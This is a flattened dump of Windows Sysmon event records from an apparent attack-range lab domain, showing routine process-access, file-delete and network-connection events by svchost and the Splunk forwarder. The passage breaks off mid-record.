10341000x8000000000000000440291Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:28.154{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000440297Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:29.904{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E56E83F87264833FC1E6A659B606A1B2,SHA256=9802DE77796FF77D2D650537CB8B53B4ECEF00B709D74F4D871B6C3D67EB7D36,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000291551Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:27.463{BEA10069-D145-6086-C700-00000000BB01}2620C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-96.attackrange.local50616-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000291550Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:29.169{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A27A1CB6606018512E986A30905DFD19,SHA256=7003093BB41389A898FC26137FC31ED04A5520B85D7F8F459D2052A88943BC68,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291549Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:29.117{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=23C3E644213C91085C472FF7B69C84AA,SHA256=AA2EEDCC5DFAFDF422118E6AC2CA57E9DC83F903C277F1AC894A7D2D30BD702E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440296Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:29.155{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440295Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:29.155{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000440300Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:30.938{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8B1BDC1AC82F29654F6013F3281A90B4,SHA256=272B1AB50CD81C85F362775E4E74E968E2699D46447698E6B661108F6F1B37E3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291552Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:30.120{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1B24AFB565A67FCF75AEACDE051F6613,SHA256=4B3915A3A776440DDA74B24F212E4E9B27702E21FD674B19AC4F8598D605CFA7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440299Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:30.156{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440298Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:30.156{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000291553Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:31.141{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E0D5E3EBE13A3D0CE36B4EB93B2D3184,SHA256=CF3E15C66BAED2AFB272137CB374DE927794C8979DF83F2F4DC5DE828CC568F6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440302Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:31.157{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440301Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:31.157{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440305Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:32.158{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440304Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:32.158{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000440303Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:32.050{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=455DE9DDF9FB34D27594F1D8949421CF,SHA256=750F20D35244B937E1275ADEC78311416EDC5C5F2AEFF7AD021020F7776B822A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291554Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:32.175{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F9F04ECD84A1ACBD4AF47D9CC1EAFF61,SHA256=C2F9E25BA26BBD47FFB36DFE9C6EEA7AFA4054A92094011C748093335FD87322,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440310Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:33.159{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440309Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:33.159{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000440308Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:33.116{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=24065C14DF34D5F4EC565C8C311F42F1,SHA256=E65E657C640D743F7AB8CF3F75353D754CC8D808FD9890036AAE933B2BE04858,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000440307Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:33.115{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D0E0DB92EACC1BDAB6184D5C19FFC764,SHA256=9117FF308BE76731C67144330C1D516551D5B144BF039F778D9090264912EB61,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000440306Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:33.055{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CCA891CC9F308E02F0E78A3BE76A5FD5,SHA256=045EA846ADC8E9F79783D62320D364663DCF195F433437F8C6E55B02779B4A75,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291555Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:33.176{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=08B7C54061DAC0C3A7B7F8AC59C2CCF8,SHA256=43096809B7501851422E218E270AB316F3CA878C9926EEE3FB6F4EB00A001538,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000440314Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:30.566{42DC5269-CF43-6086-D800-00000000BA01}4100C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-932.attackrange.local62402-false10.0.1.12-8000- 10341000x8000000000000000440313Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:34.160{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440312Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:34.160{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000440311Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:34.076{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3AD6E46CF89429BDAB7191A66B3F9E2E,SHA256=A997353723D4EEBE419DC3C622CA44EC7265CC8109C0F7B8C9AFCC1F7ADF506C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291556Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:34.178{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=55357778886B0C59A3EDF3E081F8B90F,SHA256=8E906691DD2C28A75B9E4A470BBB30BB52738BA73002B927284F1773A9249C6F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000291560Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:33.424{BEA10069-D145-6086-C700-00000000BB01}2620C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-96.attackrange.local50617-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000291559Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:35.196{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5B5404AF9A404941DE5679BDC3B4E0BA,SHA256=3CBC466907369B7FFFB915508103D18297CE1516172CCA05F5B1524506A2117A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291558Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:35.196{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9D42DF89BA869B369170A649D39FFA60,SHA256=08ACB82BC5819EDAD69181AE66E090715F41DD9C41244C258D7E655112E01E57,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291557Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:35.180{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EE2FB597BCD7F94C115D1877CF6AB25B,SHA256=F15077F290C3DF6C8F0359C5257C60F98211CE19C3144F0EBFAB66C9F47A1462,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440317Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:35.161{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440316Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:35.161{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000440315Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:35.087{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5F87BEA38DF005D1FD263B712E502EFF,SHA256=2F891458A491CFC4F84CB14BA9A7D162413DD46E45B71BAD43019FA9EE5B7210,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291561Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:36.198{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1A30E83AABEB062A14A60C1E719728C0,SHA256=AF61895E9641AADDEC0055A281C45FB0392DFF9431656856E2E68AB87A7550D1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440320Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:36.162{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440319Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:36.162{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000440318Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:36.092{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A5B0D72380675BE5E763C10548E09249,SHA256=72BD75B036472A1C8C13915D35B500D9FE253AFB69F881666300C9AB84184CC8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440323Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:37.163{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440322Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 